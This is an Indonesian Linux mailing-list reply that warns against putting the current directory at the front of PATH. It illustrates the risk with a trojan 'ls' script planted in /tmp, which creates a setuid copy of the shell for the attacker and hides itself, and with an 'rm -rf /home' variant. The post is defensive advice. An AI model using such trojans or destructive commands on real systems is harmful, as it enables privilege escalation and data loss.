At 19:10 08-10-99 -0500, you wrote:
>- current directory (".") nggak ada di search path untuk execution
> program (coba 'echo $PATH'), tapi coba dihindari menambahkan "." ke
> search path, kurang baik untuk security.
>--
>Ronny Haryanto <[EMAIL PROTECTED]>
tip.
kalo emang mo nambahin . ke search path, tambahkan di akhir,
jangan di awal. jadi:
PATH=$PATH:.
jangan
PATH=.:$PATH
kenapa? coba liat skenario berikut:
evil user:
[evil@evil]$ cd /tmp
[evil@tmp]$ cp ~/virus ./ls
[evil@tmp]$ logout
root (korban):
[root@tmp]# ls -al
karena /tmp world writable, evil bisa menulis file di sana.
di kasus ini dia membuat file2 dengan nama perintah umum
(ls, df, w, dll). jika root kebetulan berada di tmp dan
mengetikkan salah satu perintah tsb, hasilnya adalah file
milik evil yang dijalankan (bukan file2 di /bin atau /usr/bin
dulu, karena search path . ada di depan). virus bisa berupa:
#!/bin/sh
cp /bin/sh /home/evil/.sh
chmod u+s /home/evil/.sh
/bin/ls $*
rm -f /tmp/ls
atau malah:
#!/bin/sh
rm -rf /home
Jangan korbankan security hanya demi dua karakter kenyamanan.
--
Steven Haryanto <[EMAIL PROTECTED]>
--------------------------------------------------------------------------------
Utk berhenti langganan, kirim email ke [EMAIL PROTECTED]
Informasi arsip di http://www.linux.or.id/milis.php3
Pengelola dapat dihubungi lewat [EMAIL PROTECTED]
